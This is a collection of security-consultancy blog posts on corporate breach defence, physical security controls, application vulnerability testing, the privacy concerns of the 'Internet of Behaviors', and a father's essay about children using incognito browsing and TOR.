Organisations in the digital ecosystem spend millions trying to establish controls around their corporate networks from data breaches. This to a great extent does not phase away from the fact that breaches still occur even to the most secure infrastructures. Taking a look at the incidents in the past, high profile breaches target giant firms such as Solar Winds, Marriot, Fastly, Colonial Pipeline, Electronic Arts (E.A) and so many others whose sensitive information was stolen and had major economic and security-related impact alongside reputational risks. Ransomware is on the rise targeting most SMEs (small and medium businesses) and worrisomely supply chain security weaknesses are witnessed in most security breaches. Malicious attackers with little failure infiltrate email servers, file servers, core systems to organizations through unknown/unpatched vulnerabilities and open doors to tones of confidential data. This is Data are the sensitive records that giant companies like Marriot, Microsoft and government entities among others collect from their customers and citizens. Such data always include email addresses, passwords, social security numbers etc. Why data breaches when organizations invest heavily in network security? It’s not clear why systems for organizations that have set aside security budgets and adequate controls are still compromised. Is it a question of limited resources in some organizations, could it be a question of the skills gap in cybersecurity or expertise and or inadequate budgets in some organizations? Most enterprises experience data breaches due to the factors stated above. But whilst these factors could be true and certainly play a part, the key issue is most organizations don’t understand the gravity of this matter and do not take in mind to locate where the weaknesses are in their threat surface until systems are compromised. It is at this point that organizations wake up and invest heavily in identifying the cause of the breach. By the time they do this, it is too late and hard to prevent the aftermath of the breach or reduce the impact. Cyber attackers have an edge where they look for every possible opportunity availed to them just to succeed once into the corporate network and have access to the sensitive information and as for the security teams and network, defenders need to succeed every time. As the digital ecosystem is scaling every time, so are adversaries who have now found it easy to use automated& AI-driven tools to profile the security landscape of the target systems and penetrate and attack corporate networks with ease. Levelling the playing field for attackers With increasing cyber incidents, organization security teams face a couple of challenges from social engineering attempts, Advanced persistent threats (APT), Ransomware attacks Unpatched systems, supply chain risks among other cyber challenges. The companies’ threat landscape requires constant vigilance. Organizations must keep up and illustrate the best practices and training, and ensure their teams are well-staffed to detect and respond to attacks on the ever-increasing attack surface. To this end, organizations should do the following to level the playing field against threat actors who work tirelessly towards compromising the safety and security of your company’s IT infrastructure and data; Train/Educate and prepare your entire organization. With the ever-evolving threat landscape, organizations should find it necessary to create a strong security culture starting with training staff with basic security knowledge on how to identify, predict, and protect company information security systems. In addition to taking preventative technical steps such as utilizing offline encrypted backups, restricting user permissions, and restricting privileges. Network security leaders should educate and prepare the organization’s staff to serve as ambassadors for cyber safety in their organization. To that end, employees at all levels should be educated in the basics of cyber safety. Train them on the most common types of cyber threats (malware, phishing, ransomware, and man-in-the-middle attacks) as well as some of the basic terms applicable to network security. Forexample, the meaning and significance of endpoint security and your organization’s firewall. In educating your team, remember that practice is also important. Take time to conduct role-plays that test your employees’ proficiency with completing due diligence before opening an email, clicking a link, or sending sensitive or financial information in an email is an investment that can pay untold dividends in protecting your organization against a cyber-attack—and the business interruptions, legal risks, and reputational harms they often provoke. Empower your Incident Response Team During an attack, the incident response team should be well equipped and knowledgeable about cybersafety and prepared to respond. The response team should be proactive and provide top management with a strategy to mitigate attacks. The team files incident reports that top management benchmarks to make ongoing decisions on enforcing a security culture. The response team guides the organization’s corporate board in assessing and responding to a breach. This team should include professionals with authority and expertise in IT, operations, human resources, and internal and external communications. This team must act quickly to limit the scope of the attack and assess any damage or ongoing risk. To assist with doing so, the response team should also include legal counsel. Synergy with a legal professional will streamline the process of crafting internal and external communications about the suspected incident, managing law enforcement and governmental reporting where necessary, and conducting an internal investigation of the occurrence to preserve your organization’s attorney-client privilege and work-product protection where appropriate. Automating security practices. Much as attackers also automate their reconnaissance and target risk profiling to better understand the target and the weaknesses. Automation could also likely be a big part of the solution. Regardless of the industry or application, automating tasks allows businesses to concentrate on more productive problem-solving network defending activities. Additionally, these problem-solving activities foster innovation and can lead to a more resilient cybersecurity organization. Most cybersecurity products designed to automate threat detection, threat identification and risk profiling processes are widespread. Most organisations have already implemented automation tools somewhere within their organization. Automation enables organisations to be proactive about improving their cyber resilience rather than being a gold mine for attackers. Automated
Physical security: What Organizations are lacking in their security strategy?
Protecting company data, sensitive and high priority information, corporate networks, software, company equipment, and personnel is what makes physical security. Physical Security is affected by two factors and these are; natural attacks like fire, flood, power fluctuations, etc. Another is a malicious attack from malevolent threat actors. The attack could be in form of terrorism, vandalism, and theft. physical security minimizes this risk to information systems and information. Systems and devices provide attackers with additional attack vectors due to available vulnerabilities to connect to corporate networks, infect other devices, and exfiltrate data; therefore, access to systems, equipment, and respective operating environments should be limited to only authorized individuals. Multiple layers of physical security can be implemented to protect the most critical assets and services. What is Physical security? According to the Dictionary of Military and Associated Terms, physical security is defined as the part of security concerned with physical controls designed to safeguard personnel; to prevent unauthorized access to equipment, installations, material, and documents; and to safeguard them against espionage, sabotage, damage, and theft. Physical security is often regarded as the “forgotten side of security” and yet it is a key element to an overall company protection strategy. Proprietary, sensitive, and classified company material must be kept from the public who do not need to know. This is done by restricting unauthorized personnel from accessing or entering company restricted areas. The General traffic flow to the area must be diverted away to minimize the entry of unauthorized personnel. Authorized personnel to the restricted areas should possess something that identifies them, say a company badge. All authorized personnel should be on the access list otherwise they are not identified. Why your organization would need Physical security compliance? Security to any firm is so crucial, we are the information gatekeepers at all times. We are the protectors of the organization from all threats; regardless of whether they are malicious, internal, or environmental. We need to be vigilant and confident that the work we are doing will be regarded as a necessary operational function for the overall security and the protection of the company asset. Organizational assets may be categorized as employees, information, and intellectual property. Protection of these three things is the cornerstone of our profession. What are some of the common physical security threats in your environment? While organizations establish security strategies, it’s good practice to establish a physical security plan for either their existing property or new-build. The Organization should bear in mind the common physical security threats and vulnerabilities, and how the different types of physical security threats should be encountered. There are a variety of physical security threats in every stage of design, implementation and maintenance of the company property. Some of the common physical security threats include; Vandalism, theft & Burglary, Sabotage and Terrorism, Unaccounted visitors, Stolen identification, Social engineering How should your organization handle physical security Risk? To better answer this, there should be an insight into what could go wrong or the aftermath of a physical security breach. Imagine that an attacker finds their way into the work-space or corporate network. all information systems and information are considered are vulnerable to compromise and theft. Computer systems and some end-point devices may be left behind and unmonitored outside the view of security cameras; workstations still unlocked with access to files, network shares, and other network resources; and sensitive or confidential data may still be open in plain view on the screen and can be captured, stolen, modified, and/or deleted. Once an attacker has access, their actions may not be predictable. The only way to control their actions is to implement measures and enforce best practices that can help protect the intellectual property of the organization and digital assets. The following measures are a bare minimum of what organizations can do to reduce the likeliness and impact of physical attacks; Physical security policy for compliance. Organizations no matter the size should implement a physical security policy for compliance with industry security standards but also to adhere to the physical security requirements. Do you have a physical security policy in place? If you lack one, Get a template HERE and create one for your organization 2. Lock workstation and put down screens when not in use. Organizations should offer awareness sessions that train staff on the importance of locking their workstations when stepping away from them. This is aimed at protecting sensitive information on the devices. IT Security teams should enforce a lockout policy to automatically lock screens after inactivity and or on much-attempted access. 3. Provide adequate security to all physical devices. Enable a password/passcode or an additional authentication factor on all devices to prevent unauthorized access in the event a device is lost or stolen. 4. Do not share login credentials or other sensitive information. Login credentials and other sensitive information should remain private and not shared with anyone, posted in plain view, or saved on your computer or other platforms. 5. Make several backup copies of the devices. Protect your information from malware, hardware failure, damage, loss, or theft by making multiple copies and storing them offline. 6. Implement endpoint security. IT departments should implement endpoint detection and response software, host-based firewalls, device and file encryption, and keep devices updated with the latest security patches. 7. Record instances of theft of both identity or devices and Remediate. IT departments should monitor system and network access logs for signs of access and exfiltration. utilize remote administration and data wiping solutions to regain control of devices once stolen. 8. Enable 2-step verification before system access. MFA is the use of two or more authentication mechanisms to access an account or service. This significantly reduces the risk of account compromise via credential theft in which your password has been exposed. Even if a cybercriminal obtains a user’s username and password, they will be unable to access that user’s account without their second factor. 9. Invest in Education and or security awareness training. Organizations should invest time, money,
Applications Harbour a plentiful of Low-hanging fruits for attackers: Have you protected yours?
Did you know that 99.7% of applications have at least one vulnerability! Findings from Verizon’s 2020 Data Breach Investigations Report show that malicious attackers take advantage of application weaknesses and software vulnerabilities. This is to conduct data breaches against organizations. This is the ever-known most common external attack method. More cybersecurity statistics from security researchers have it that application vulnerabilities will continue to be the common attack method. Malicious attackers lurk in the digital sphere hunting for either software vulnerabilities or web applications. This is undoubtedly an eye-opener for you who is concerned about the sensitivity of the information on the applications. And also to you who develops the applications of your organization, right? I have to admit, that as a security practitioner, I’m not at all surprised at that number. Applications bear low-hanging fruits that attract attackers According to the Cybersecurity threat landscape survey that we conducted in June-July 2021. We note that the common threats that organizations encounter, software vulnerabilities and web application threats most. According to the research made by Ponemon Institute, about The Increasing Risk to Enterprise Applications, “They denote that the investment on application security is not commensurate with the risk.” The report denotes a significant gap between the level of application risk and what companies are spending on to protect their applications,” while “the level of risk to other assets like networks is much lower than the investment on network security.” But most applications are made by big vendors, could they also be malicious? Amazon, Microsoft and Google have much bigger security budgets than you do. They have hundreds of people all over the world ensuring that their infrastructure is secure. Their teams are constantly reviewing their code, looking for flaws, vulnerabilities and potential exploits. They monitor hacking forums and run attractive bug-bounty programs to remain proactive. Only a few years ago, kernel errors were prevalent. Now, Microsoft’s and Linux’ teams have nearly eliminated kernel vulnerabilities. For example, according to the CVE database, in 2017 Linux kernel had 169 code execution vulnerabilities, in 2018 only three and 2019 just five. Are cloud applications safer? In most of our field security endeavours. We exchange thoughts with many leaders of various organizations about securing the evolving technology. Organizations seemingly compare their infrastructure to the cloud. But when it comes to cloud platforms. The cloud host or providers take as many precautions and invest greatly in securing the cloud. The only defect is the clients on the cloud are duly responsible for the security of their applications in the cloud. This is where the danger lasts. Very many organizations have developers for their applications and or which outsource their application requirements to external software vendors. In most cases, the developers utilize software architectures and or templates distributed across the public cloud. They use these to develop the applications that organizations use to handle sensitive information. The pieces of code or templates of applications that developers use for customization into whatever applications that organizations use. Contain their developed pieces from scratch, open-source codes and third-party products, over which developers have no control. So there are so many weaknesses and or threats that come along with these pieces of software. These weaknesses are not addressed which may lead to security compromises. Attackers are much aware that developers don’t prioritise security aspects in the software development life cycle. Or miss out on certain aspects. This gives them chance to alter existing applications or inject additional code and turn legitimate software into malicious ones. This kind of vulnerability is listed in the “code execution” category, noted as the biggest group in the CVE database. “Research has it that on average, organizations need more than 50days to patch known vulnerabilities. But on the other hand, hacktivists just need a few minutes to locate these and exploit them to their interests. “ Applications are a potential threat to the security of critical information systems of organizations. How do we protect them? If there is going to be a secure environment where exiting software applications are at manageable risk. Organizations need to make sure that their application security practices evolve beyond the traditional ways of blocking traffic. They need to understand that investing heavily in network security is not enough. There is a need to focus the application security in various ways. This will involve investing in application security testing tools during the entire software development lifecycle. The Security scanning tools identify areas of weakness and malicious codes and remediate the likelihood during development. Runtime protection works when applications are in production. It’s important to remember that runtime protection tools provide an extra layer of protection. But these are not an alternative to scanning. The security scanning tools are not entirely the solution to the problem and their goal is prevention. The tools detect and remediate vulnerabilities in applications before running applications in a production environment. In most of our security assessments at Summit Consulting Ltd, we have conducted vulnerability assessments on thousands of applications over these years. But what worries, we haven’t encountered a single application that did not have a vulnerability! Conclusion If you’ve not done a security audit (VAPT) for your application until now. Get up to speed and conduct one right away. And if you’ve been there before, I’m pretty confident you know the power of regular audits by now. Ready for your first VAPT? Have questions? Contact +256782610333 or strategy@summitcl.com
Technology Intertwined with Human Behaviour; What are the Implications?
In this digital generation, the great shift to mobile devices and technology adoption has tremendously changed our mode of interaction. How we use these devices and how we respond to some activities on the devices. The way we feed information on certain applications provides a lot more valuable information about our behaviour, what we love. Our preferences and our everyday digital life. This brings about the evolution of “ Internet of Behavior (IoB)”. According to the strategic predictions for 2020. Gartner said that the Internet of Behaviors is increasingly trending and will be known to everyone. And as digital practitioners, we may have no choice but to live with it as a society. It is also predicted that by 2023, 40% of all individual activities of the global population will be tracked digitally. This is aimed to influence the behaviours of digital users. In this article, we will focus on what the Internet of Behavior (IoB) is. How businesses benefit from it. And how enterprises can use all collected user data from users’ online activities into something profitable to the organization. We will also embark on the privacy and security concerns that come along with this emerging technology What is the Internet of Behaviours? Reference made to Internet Of Things (IoT). This is a network of interconnected physical objects that gather and exchange information over the connected network (internet) The Internet of Behavior extends from the Internet of Things (IoT). And the interconnected nature of physical devices to share information results in vast data amounts of new data sources. The data shared is data from clients provided as they interact with company applications and other users of tech. Organizations get access to this data with the help of the ‘sharing’ feature across connected devices. Let’s take an example of a smartphone, with the use of the geolocation feature on these devices. The phone can track the users’ online activities and shifts in different geographical locations. Organizations can take advantage of this possibility to link your smartphones with your laptop. Your voice assistants at home and cameras, your car cameras, and or your phone records (texts and phone calls). From this, companies can tell more about their employees, including their interests, social behaviours, their character, and their online interests. The value of the Internet of Behavior to organizations With the evolving technology, organizations have benefited in multiple ways. From positively engaging customers to understanding where their interests in a product begin, their purchase journey. And the habits exhibited during the purchase of their choices of products. The Internet of Behaviours tool to organizations utilizes customer’s behavioural analysis and psychology to study unachievable data from users previously. This data includes the likes and preferences of customers, most-visited products from platforms. And behavioural patterns exhibited during the purchase of their adorable products. Internet of Behaviours also takes note of how clients interact with their mobile devices in their daily lives. Organizations going forward can make use of the IoB as a powerful marketing and sales tool. Businesses gain a deep understanding of their customers. This will help organizations to build their product and marketing strategies to create and promote products that users will want to buy. This is to boost the development of the sales to businesses. Security and Privacy issues brought about by IoB When it comes to data in abundance, another concern about the privacy and security of this data raises. The IoB is not much regarded as problematic; many technology users have no problem syncing their devices. However, there is concern regarding the collection of data, navigation, and usage. To many of the challenges faced by this emerging technology, security and privacy of data security is a growing concern. Many users admit that considering the security complications and inadequacy might slow their adoption and use of certain IoT devices. Cybersecurity experts find IoT and IoB problematic because of the lack of a defined structure and or legality. IoB interconnects user data with their decision-making. Internet of Things (devices) does not gather user data solely from their relationship with a single company. For example, a car insurance company in Uganda can look through a summary of a user’s driving history. What’s worse is with IoB, the insurers might also have an opportunity to the users’ social media profiles and interactions. To better understand or “predict” their driving experience. This is extralegal and beyond the data privacy of users. Besides, this is not only the concern about the devices. Without the knowledge of the technology users, many companies distribute or sell user data across company lines without users’ permission. Conclusion The emerging technology proves beneficial for enterprises. Businesses can optimize their relationship with the users depending on the collected data. Just like we have witnessed the way IoT works by converting collected data about users’ behaviour into information. The question still stands, will IoB translate this attained information from our data into real wisdom?
The Incognito kids
In the good old days, before COVID19, the easiest way to keep children from online dangers was to not give them Internet access. As someone who has investigated several cases of cyberbullying, online identity theft, cyber harassment and of course cyber ransoms against kids nudity and threats, I know first-hand why irresponsible online access could lead to long term suffering to victims. However, the lockdown made online learning a must. Now, all children must access the Internet to attend virtual classes. In addition to whitelisting the acceptable sites, the kids now know about the virtual private network (VPN) thanks to the government’s OTT which help proliferate and create awareness of VPNs. When technical solutions fail, you go morally. I had to introduce family values: While online, make the right choices – the internet is like electricity. If you use it well, it will give you light and power to your life’s essentials. However, if you use it badly it will burn you, and your house. When you are online, you are like in a huge city. You must go to places you know, otherwise, you will be kidnapped and killed by strangers. The Internet is like a restaurant, with so many foods on the menu, you must choose what you love eating. Even if you see many things for download, do not click unless you know what you are downloading. Personal hygiene. Sanitation. Academic excellence and discipline are your guides. Keep your computer clean. Don’t drink or eat over the keyboard. Try to learn as much as you can online and listen to your parents, elders, and teachers. Today, one of my kids came to tell me “Daddy, I have seen someone using Incognito in Chrome.” I was surprised. Incognito. It’s something that even us the cyber security folks take time to come to grips with. And then when he also told me, that “they also downloaded TOR”, I got scared. How are the kids finding out these things? The other time when I disabled WhatsApp on the phone, the kid found a way to connect it via browser. She was so disciplined. Stopped asking for a phone for over two weeks and I was feeling so excited that my girl has overcome her weakness of the mobile phone. However, a chance encounter on her laptop, made me catch her live with WhatsApp live. “The zoom sessions are always sent via WhatsApp, and since I could not access the phone, I had to connect directly using the QR code”, she said in my face. Ok, no worries. Next time do ask. How do you parent kids that are savvier than you? These Incognito kids have challenged me. I will not tire telling them about the opportunities the Internet has to offer, and the dangers therein. I pray they chose well. Copyright Mustapha B Mugisa, 2021 Mr Strategy. All rights reserved.
